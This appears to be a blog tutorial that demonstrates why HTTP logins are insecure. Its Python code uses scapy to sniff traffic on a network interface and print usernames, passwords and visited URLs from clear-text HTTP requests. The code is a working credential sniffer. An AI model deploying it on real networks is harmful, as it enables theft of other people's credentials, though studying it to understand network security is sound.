Clear text site
Nowadays it is quite rare to find an HTTP login page, because HTTP is insecure: information sent to an HTTP site is all clear text, so if there is a man in the middle sniffing packets, it is possible to reveal the username and password.
I have written a class in Python to demonstrate this man-in-the-middle sniffing. Doing man in the middle is easier said than done: you need to find a way to intercept traffic sent from the original host.
The modules I am using are scapy and scapy-http. Scapy does not have an HTTP filter and hence cannot extract the header and payload of an HTTP request; scapy-http adds an HTTP filter which can capture the entire HTTP payload.
import scapy.all  # packet capture module
from scapy_http import http  # supplements scapy by providing an HTTP filter
from urllib.parse import unquote  # turn URL-encoded text back into readable text


# main class known as sniffing, the class file is k9.py
class sniffing:
    """Sniff HTTP requests on an interface and print their raw payloads.

    The Raw layer of an HTTP request is where form data such as the
    username and password travels in clear text.
    """

    def __init__(self, interface, filter=""):
        # filter is optional, default is an empty string (capture everything);
        # examples: "port 80", "tcp", "udp", "port 21", etc...
        self.sniffs(interface, filter)

    def processing_packets(self, pkt):
        """Per-packet callback: print the URL-decoded body of HTTP requests."""
        if pkt.haslayer(http.HTTPRequest):  # HTTP request filter
            if pkt.haslayer(scapy.all.Raw):  # Raw data contains user and pwd
                # Decode the payload bytes explicitly: str() on a Raw layer in
                # Python 3 yields a b'...' repr, which garbles unquote()'s output.
                payload = pkt[scapy.all.Raw].load.decode(errors="replace")
                print(unquote(payload))  # reveal the username and password

    def sniffs(self, interface, filter):
        """Start the capture: scapy calls processing_packets for every packet.

        store=0 avoids accumulating packets in memory during a long capture.
        """
        return scapy.all.sniff(iface=interface, store=0,
                               prn=self.processing_packets, filter=filter)
This is the main code that executes the script:
import k9  # the sniffing class defined above (k9.py)

# Guard the entry point so importing this module does not start a capture.
if __name__ == "__main__":
    try:
        # 'en0' is the default interface on macOS; Ctrl-C stops the capture.
        k9.sniffing('en0')
    except KeyboardInterrupt:
        print('Exit...')
Below is an improvement of the sniffing class: it only prints when username and password variables are present (otherwise it prints nothing), and it also shows the site where the username and password are used.
from scapy import all as scapy  # packet capture module
from scapy_http import http  # supplements scapy by providing an HTTP filter
from urllib.parse import unquote  # turn URL-encoded text back into readable text

# keywords guessing the variable names used for username and password fields
keywords = ['pass', 'password', 'usr', 'username', 'user', 'pwd']


class sniffing():
    """Sniff HTTP requests, printing visited URLs and credential-like payloads.

    A payload is only printed when it contains one of the username/password
    keywords above; everything else is ignored.
    """

    def __init__(self, interface, filter=""):
        # filter is optional; an empty string captures everything
        self.sniffs(interface, filter)

    def processing_data(self, pkt):
        """Per-packet callback: print the request URL and any credential data."""
        if pkt.haslayer(http.HTTPRequest):  # look for an HTTP request
            req = pkt[http.HTTPRequest]
            # Host and Path come back as bytes in scapy-http, so decode the
            # concatenation before printing instead of showing a b'...' blob.
            url = req.Host + req.Path  # the URL the victim visits
            print(url.decode(errors="replace") if isinstance(url, bytes) else url)
            if pkt.haslayer(scapy.Raw):  # username and password appear in Raw
                # Decode the payload once, outside the keyword loop, rather
                # than re-converting it for every keyword tested.
                payload = pkt[scapy.Raw].load.decode(errors="replace")
                for keyword in keywords:  # check if each keyword exists
                    if keyword in payload:  # in the raw field
                        print(unquote(payload))  # print the content once
                        break

    def sniffs(self, interface, filter):
        """Start the capture; store=False keeps memory flat on long runs."""
        return scapy.sniff(iface=interface, store=False,
                           prn=self.processing_data, filter=filter)